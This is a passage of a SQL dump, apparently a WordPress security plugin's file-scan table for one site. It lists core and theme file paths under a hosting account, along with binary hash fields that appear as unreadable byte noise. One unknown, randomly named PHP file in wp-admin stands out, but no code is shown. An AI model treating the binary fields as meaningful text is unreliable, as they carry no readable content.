_CpS^0\nʑW9#AY\'pp','',0,'?'),('6u@\0M','wp-content/themes/twentytwentytwo/inc/patterns/header-logo-navigation-offset-tagline.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-logo-navigation-offset-tagline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9LV k ֵy/','hjW\'gl\0Iء<$bX7','',0,'?'),('4=+@MHTY','wp-content/themes/twentytwentytwo/inc/patterns/header-logo-navigation-social-black-background.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-logo-navigation-social-black-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y0=Iv]','%ͥzE_&!z?#`+~ `','',0,'?'),('A^\\\0E%{','wp-content/themes/twentytwentytwo/inc/patterns/header-small-dark.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-small-dark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2y#[}','sg]‘go\nE\0\n%fcNH','',0,'?'),('rfLS','wp-content/themes/twentytwentytwo/inc/patterns/header-stacked.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-stacked.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w /77fVg&','vEx,%%NA 6;34*E;`#5a','',0,'?'),('5','wp-content/themes/twentytwentytwo/inc/patterns/header-text-only-green-background.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-text-only-green-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n ^oĝ۞','LҕdL&G*v,؂x!r^','',0,'?'),('x*3uwX','wp-content/themes/twentytwentytwo/inc/patterns/header-title-navigation-social.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-title-navigation-social.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5]P\"F.','W\"f#1Etbj','',0,'?'),('zOXf>kZbq','wp-content/themes/twentytwentytwo/inc/patterns/header-with-tagline.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/header-with-tagline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wnO/Rr wLO','q΍e10qEAyFɫV','',0,'?'),('\'.K90Զ','wp-content/themes/twentytwentytwo/inc/patterns/hidden-404.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/hidden-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eܧ8nMd','LlX*8H$X^?Dx','',0,'?'),('\Z\r\\9\'','wp-content/themes/twentytwentytwo/inc/patterns/hidden-bird.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/hidden-bird.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c~LA\"5','qmi\r<Ёݶ\r:;ǚh ','',0,'?'),(' hѺtX5U','wp-content/themes/twentytwentytwo/inc/patterns/hidden-heading-and-bird.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/hidden-heading-and-bird.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p)*C7|Kq','2c\n ҳZB5^DaUȷ6-\'GcF','',0,'?'),('Z<[KUu e','wp-content/themes/twentytwentytwo/inc/patterns/page-about-large-image-and-buttons.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-about-large-image-and-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߄ǟ94@','\\&ep<䥟oGsشwX[G~S','',0,'?'),('c77*B2','wp-content/themes/twentytwentytwo/inc/patterns/page-about-links-dark.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-about-links-dark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KL?0]','N8,.ڮloTDؘR|9c{7w','',0,'?'),('=Bl)I','wp-content/themes/twentytwentytwo/inc/patterns/page-about-links.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-about-links.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U7T~@\n.D','&D\n\r<~\r/4$ r_','',0,'?'),('bb\nn\\Vo&','wp-content/themes/twentytwentytwo/inc/patterns/page-about-media-left.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-about-media-left.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' s <OT䚼?','́\0<ȍ?-)fzSH','',0,'?'),('+P%8B\0','wp-content/themes/twentytwentytwo/inc/patterns/page-about-media-right.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-about-media-right.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tOPR%/','(r!#u8b|O6,Jf','',0,'?'),('mJG@z\'C;Qs!','wp-content/themes/twentytwentytwo/inc/patterns/page-about-simple-dark.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-about-simple-dark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v$V&>_','@@2o0|[wcWCKF\'','',0,'?'),(',+L\\Ac','wp-content/themes/twentytwentytwo/inc/patterns/page-about-solid-color.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-about-solid-color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fA\'mPh','mm=njp߮\r}l8Þ','',0,'?'),('beent','wp-content/themes/twentytwentytwo/inc/patterns/page-layout-image-and-text.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-layout-image-and-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7xDDpx','~;M3Hn\0{z_;R(','',0,'?'),('~ g؀j8','wp-content/themes/twentytwentytwo/inc/patterns/page-layout-image-text-and-video.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-layout-image-text-and-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iJٹ8.WB','<2c4\"p\0To!RwCKxD','',0,'?'),(')vN7p.S+','wp-content/themes/twentytwentytwo/inc/patterns/page-layout-two-columns.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-layout-two-columns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A\n\'K3D ;e','0Voj~E`L\'\n8~RkbZ{s(','',0,'?'),('[qE\'a?','wp-content/themes/twentytwentytwo/inc/patterns/page-sidebar-blog-posts-right.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-sidebar-blog-posts-right.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D\n\\!','*0$b+DWӟ\'(q.\Z','',0,'?'),('ۙȂ\'.gJ\\e','wp-content/themes/twentytwentytwo/inc/patterns/page-sidebar-blog-posts.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-sidebar-blog-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wh!R|\Z\"|0','jIW+{FС K\rAg (X8','',0,'?'),('|+X†aI/','wp-content/themes/twentytwentytwo/inc/patterns/page-sidebar-grid-posts.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-sidebar-grid-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','کqM^to+%','?\nۡ.=befQkj\0{p|L` ','',0,'?'),('.Wt_D3','wp-content/themes/twentytwentytwo/inc/patterns/page-sidebar-poster.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/page-sidebar-poster.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WB\\U6t@W','Z_0_ZãӒixEއ5 |Q','',0,'?'),('\'qRBIo\0','wp-content/themes/twentytwentytwo/inc/patterns/query-default.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/query-default.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߩ8z4B','8z>_(zg7/B?4Z0p\0Fs\\','',0,'?'),('UBT{Zh{:(+7','wp-content/themes/twentytwentytwo/inc/patterns/query-irregular-grid.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/query-irregular-grid.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|-+A s嚤','iJ6,,T|hX* iŸ','',0,'?'),(')ֱf ~{G','wp-content/themes/twentytwentytwo/inc/patterns/query-large-titles.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/query-large-titles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#./.nh-Xڂ','\'KGԌ`69&%\0M|\\y','',0,'?'),('\\\Z}dqP0G','wp-content/themes/twentytwentytwo/inc/patterns/query-simple-blog.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/query-simple-blog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ՈPɵ*-r','FW*#a\0;+G\"{9\"nkA','',0,'?'),('J.FGZ7cؕ','wp-content/themes/twentytwentytwo/inc/patterns/query-text-grid.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/query-text-grid.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\')zW#CK!','졪\"z>/W˪ص -rڵvMo !','',0,'?'),('[&adXm0Y ','wp-content/themes/twentytwentytwo/index.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_5P[Oanv','k\\h6kK4&my0gF','',0,'?'),('+I6з2','wp-content/themes/twentytwentytwo/parts/footer.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/parts/footer.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!>x)V)PEG','1Jgnk_dN[%Q`|!(c2','',0,'?'),('m?\\ϪaGF','wp-content/themes/twentytwentytwo/parts/header-large-dark.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/parts/header-large-dark.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NԻU_ml\0BY5','&0M/WGbv?1m.2%v','',0,'?'),('S. ®','wp-content/themes/twentytwentytwo/parts/header-small-dark.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/parts/header-small-dark.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I!6^XQ+g',' $$opñy2\"tAk,c\ZIy','',0,'?'),('VhXnA.2z','wp-content/themes/twentytwentytwo/parts/header.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/parts/header.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=<\rp\r LFz','?C-欳Y6c\'\Zvw=)*o','',0,'?'),('Do^~m9y','wp-content/themes/twentytwentytwo/style.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/p U-=_','h\'b(','8!S|wrD|۽Ć/R|yV','',0,'?'),('59 \'vJ}','wp-content/themes/twentytwentytwo/templates/index.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/templates/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IQ&zM,6X',':&*b2f}vQ,.ժ','',0,'?'),('taV/>P','wp-content/themes/twentytwentytwo/templates/page-large-header.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/templates/page-large-header.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<\Zzݺ~ǡ','G#\'`&fB!3`','',0,'?'),('ay9}`nl','wp-content/themes/twentytwentytwo/templates/page-no-separators.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/templates/page-no-separators.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g lpGQOl','8FH>/>(ŶfXW =0&&\r \r','',0,'?'),('nkX*V\ZLd','wp-content/themes/twentytwentytwo/templates/page.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/templates/page.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i]6aذ+e','\'ftgx9I8&l< P\0\'\rQh(3','',0,'?'),('CEvZ>IAʐm`','wp-content/themes/twentytwentytwo/templates/search.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/templates/search.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p21%','g.hLٲ􉒄Ք\0tu@','',0,'?'),(';b(.(S','wp-content/themes/twentytwentytwo/templates/single-no-separators.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/templates/single-no-separators.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4!et鶛b,','#WVCPdvJ\nBo4,Q;','',0,'?'),(',Z삦','wp-content/themes/twentytwentytwo/templates/single.html','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/templates/single.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zoyN]ɽ2','\0hkQv6Pr\":RF.m$ ϭI','',0,'?'),('~e/!','wp-content/themes/twentytwentytwo/theme.json','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/theme.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K|8 CϞ','_|u$ ܏18:C^j\rv`','',0,'?'),('xsԶǗ^`','wp-content/uploads/wc-logs/index.html','/home/tummmyov/tummyrevolution.com/wp-content/uploads/wc-logs/index.html',0,'ُ\0 B~','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('~Δ,zGh','wp-content/uploads/woocommerce_uploads/index.html','/home/tummmyov/tummyrevolution.com/wp-content/uploads/woocommerce_uploads/index.html',0,'ُ\0 B~','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('+W ϞFʒU','wp-content/uploads/woocommerce_uploads/reports/index.html','/home/tummmyov/tummyrevolution.com/wp-content/uploads/woocommerce_uploads/reports/index.html',0,'ُ\0 B~','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('F[7׋\r5K','wp-content/w3tc-config/index.html','/home/tummmyov/tummyrevolution.com/wp-content/w3tc-config/index.html',0,'ُ\0 B~','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),(' .ۙAt>rk','wp-content/w3tc-config/master.php','/home/tummmyov/tummyrevolution.com/wp-content/w3tc-config/master.php',0,'Ho?1iZ L{q','Ho?1iZ L{q','m3)rrzEmzظC','',0,'?'),('& Ps hcusS','wp-content/wflogs/attack-data.php','/home/tummmyov/tummyrevolution.com/wp-content/wflogs/attack-data.php',0,'#ح\nyIb\r\r','#ح\nyIb\r\r','l4Eq{\'wg31cw:','',0,'?'),('5#t5RшK','wp-content/wflogs/config-livewaf.php','/home/tummmyov/tummyrevolution.com/wp-content/wflogs/config-livewaf.php',0,'BeA6A7UZ','BeA6A7UZ','nbz0-[kmވ|TW!cQ~','',0,'?'),('8?6B\rpl2Rx','wp-content/wflogs/config-synced.php','/home/tummmyov/tummyrevolution.com/wp-content/wflogs/config-synced.php',0,'A\"UW>O\"$','A\"UW>O\"$','+tg\\) @! LFrijZ,X&','',0,'?'),('_V#Bt','wp-content/wflogs/config-transient.php','/home/tummmyov/tummyrevolution.com/wp-content/wflogs/config-transient.php',0,'+\"bn/','+\"bn/','/^`G7qwYlhK','',0,'?'),('Un/|r@ڪ','wp-content/wflogs/config.php','/home/tummmyov/tummyrevolution.com/wp-content/wflogs/config.php',0,'?%EUoI(k','?%EUoI(k','3&ܝ^U\n','wp-admin/.htaccess','/home/tummmyov/tummyrevolution.com/wp-admin/.htaccess',0,'LmLQ9\\è','LmLQ9\\è','B}+VdqH#K','',0,'?'),('Y4jBȬhJ8','wp-admin/TFWk17JbsY5.php','/home/tummmyov/tummyrevolution.com/wp-admin/TFWk17JbsY5.php',0,'9lp7avbb{','9lp7avbb{','\0;x2\'s%Sϟ2c9?*=','',0,'?'),('-)75y8cWv','wp-admin/about.php','/home/tummmyov/tummyrevolution.com/wp-admin/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?u8L!a>X','MVg!A;f iq~4EP˨<','',0,'?'),('XH奥(:Z','wp-admin/admin-ajax.php','/home/tummmyov/tummyrevolution.com/wp-admin/admin-ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4l_ac-fְ','e$ynDwߋGAN dL','',0,'?'),('!1b݅9*\\','wp-admin/admin-footer.php','/home/tummmyov/tummyrevolution.com/wp-admin/admin-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZC\0Ol$','sTlEeBhv:g%k07k=&!','',0,'?'),('KUg0MU/ʇ','wp-admin/admin-functions.php','/home/tummmyov/tummyrevolution.com/wp-admin/admin-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xo_Բ)\nr','(Z!. eTU92;ݏt5o^','',0,'?'),('@mO W','wp-admin/admin-header.php','/home/tummmyov/tummyrevolution.com/wp-admin/admin-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nWuYK','=pZ.TBW!p:ٔ%tI3','',0,'?'),(']@\n>ĺYn','wp-admin/admin-post.php','/home/tummmyov/tummyrevolution.com/wp-admin/admin-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',': %Pw','Zdz ##D68\"U\09x','',0,'?'),(' ,H(b_FO','wp-admin/admin.php','/home/tummmyov/tummyrevolution.com/wp-admin/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JWw%yU','亐$γ?%I&KVlXt:','',0,'?'),(' Xt \\4vNI5j','wp-admin/async-upload.php','/home/tummmyov/tummyrevolution.com/wp-admin/async-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`Ml[q֖c','=\'b׋CÅ\ZZLzN jM1~p','',0,'?'),(')I\nΆVq{','wp-admin/authorize-application.php','/home/tummmyov/tummyrevolution.com/wp-admin/authorize-application.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&l\"Ȍh','9?sNVd:O+\'(j\';Sq','',0,'?'),('\"6\r +K{\Z!a','wp-admin/comment.php','/home/tummmyov/tummyrevolution.com/wp-admin/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3\Zƥ{p:','(՚s\0lA9Z81l','',0,'?'),('2tu6OG)%','wp-admin/contribute.php','/home/tummmyov/tummyrevolution.com/wp-admin/contribute.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b7j\rڊKe','4qmҁ5A0 G/%','',0,'?'),('kM ̙Ysp','wp-admin/credits.php','/home/tummmyov/tummyrevolution.com/wp-admin/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Abz &vm','*H*` <EQ.0?vX>?','',0,'?'),('*O-Lτ\r[u','wp-admin/css/about-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/about-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-`\rOF&~','E%oK\n$P`JشU߂ cqO','',0,'?'),('Unɓb4lZ,I','wp-admin/css/about-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/about-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7m& p(z]h7','kaԩl)2g $U$D}<','wp-admin/css/code-editor.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/code-editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','03;7v:P','JlAZqF v<3I^k','',0,'?'),('Pa`Xu','wp-admin/css/color-picker-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/color-picker-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\":@ܐ^J','E_w1:-E','',0,'?'),('rW3᥾V','wp-admin/css/color-picker-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/color-picker-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~pEScV','<=\0[Z\n2|닢\0?6','',0,'?'),('F?C;$H\r\r','wp-admin/css/color-picker.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/color-picker.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<^\rq!\Z','=Li7 tI}|9oh`o=CD','',0,'?'),('ܡ9u_\\\n9\'','wp-admin/css/color-picker.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/color-picker.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xTi6','ۣqTzuOi\\5ЯYu~=c','',0,'?'),('J|6} P,\rٛ','wp-admin/css/colors/_admin.scss','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/_admin.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa*Pa |үvT','aUQwѯ \r ׹r. 9}','',0,'?'),('ue,\"\n hg.','wp-admin/css/colors/_mixins.scss','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/_mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X`oi`HxC','dpe܊&΁s-','',0,'?'),('=CѠ*TX4','wp-admin/css/colors/_variables.scss','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/_variables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u\"t=m:Ū','~d8{Zuy4f^1\Z*KF\'?','',0,'?'),('58d`S61K>ۮv','wp-admin/css/colors/blue/colors-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/blue/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wu4΁6J\'','+Zu -.^a]\'K%','',0,'?'),('D8hFޛBViR','wp-admin/css/colors/blue/colors-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/blue/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H.ZxH[sO','\'@e!ky߃M5~ ','',0,'?'),('FZYC83E','wp-admin/css/colors/blue/colors.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/blue/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cFqs(','*CC }AL2b\"KpyZM','',0,'?'),('tm6ۗq.=j','wp-admin/css/colors/blue/colors.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/blue/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>5Y>r ','yek:\\tN','wp-admin/css/colors/blue/colors.scss','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/blue/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zb ','C׶xTZ)\r~\\Z\\%(Z֋','',0,'?'),('juGCtO','wp-admin/css/colors/coffee/colors-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/coffee/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t\",~1WU','ώ{HTM^@Ѩ\\Xr?Ւ','',0,'?'),('q?%rp07q','wp-admin/css/colors/coffee/colors-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/coffee/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ih9dbɐ0','|I[1^Ϸ{-O;3`tn&s','',0,'?'),('ϴ 3 P`#8^Z','wp-admin/css/colors/coffee/colors.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/coffee/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OTԧ','0;E Fo\nw`zrJ','',0,'?'),('eCDi!','wp-admin/css/colors/coffee/colors.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/coffee/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.]#%y\ZeS','Ma$ey--(\ǹuh','',0,'?'),('xIH.9YBO','wp-admin/css/colors/coffee/colors.scss','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/coffee/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^uiPA\Z','67SD><ȶyeՋVNcMM','',0,'?'),('jmEAXuw>܆','wp-admin/css/colors/ectoplasm/colors-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/ectoplasm/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lJ%zKSNɩ','*x6be `?Գ—2 lhkͤ','',0,'?'),('Dչ$Oa','wp-admin/css/colors/ectoplasm/colors-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/ectoplasm/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߶Ɇ\0w\'K 4 ','y@-}\"K,II\"GO','',0,'?'),('H\0ۙhC','wp-admin/css/colors/ectoplasm/colors.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/ectoplasm/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6aIH%','װB*rc5TtNZw','',0,'?'),('[#ܧ\Z>]<','wp-admin/css/colors/ectoplasm/colors.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/ectoplasm/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','363zZ]i>칊\n','wp-admin/css/colors/ectoplasm/colors.scss','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/ectoplasm/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ab.3 ^DSo','xn0 #G.즡!!i','',0,'?'),('q%ű m+','wp-admin/css/colors/light/colors-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/light/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';/I3_\rZ=','\Zβ%UK_\ZpԂa\0u','',0,'?'),('-f4]#\"ul','wp-admin/css/colors/light/colors-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/light/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=,>wRzu4d','+!WnX?\")-+8\"]A,D0','',0,'?'),('v{#lb\0}B','wp-admin/css/colors/light/colors.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/light/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[A9|Pٯ','97E\nhz{/\rZ=Kus','',0,'?'),('9(FRj2n6]','wp-admin/css/colors/light/colors.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/light/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n(썤;','[a^330$eHMr)|J\"W','',0,'?'),('KS+e׎A@','wp-admin/css/colors/light/colors.scss','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/light/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0|ⷾAHXsskWvD','*.Op[0\\:e*,I@','',0,'?'),('L?@.~O','wp-admin/css/colors/midnight/colors-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/midnight/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9(}ִ(Vv','ha? Rkm}~X\"@3','',0,'?'),('ᗏ3-4','wp-admin/css/colors/midnight/colors-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/midnight/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kRQh\nav','b_J41w\\S _f','',0,'?'),('; bfȖ0x','wp-admin/css/colors/midnight/colors.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/midnight/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s}B\Z6gb7','V3g`O%Nm:gD]<{4Qݚ3=TX','',0,'?'),('_\rJL#@B','wp-admin/css/colors/midnight/colors.min.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/midnight/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']1A9Qz}>q','Mt&}*%5\"w萆 o|x}!','',0,'?'),('w=ŢO&F','wp-admin/css/colors/midnight/colors.scss','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/midnight/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DI0\'|`n_(','\\&5e\\kqpAnL:b','',0,'?'),('Sj~6{X','wp-admin/css/colors/modern/colors-rtl.css','/home/tummmyov/tummyrevolution.com/wp-admin/css/colors/modern/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fiKSS ũIb','` q!ء 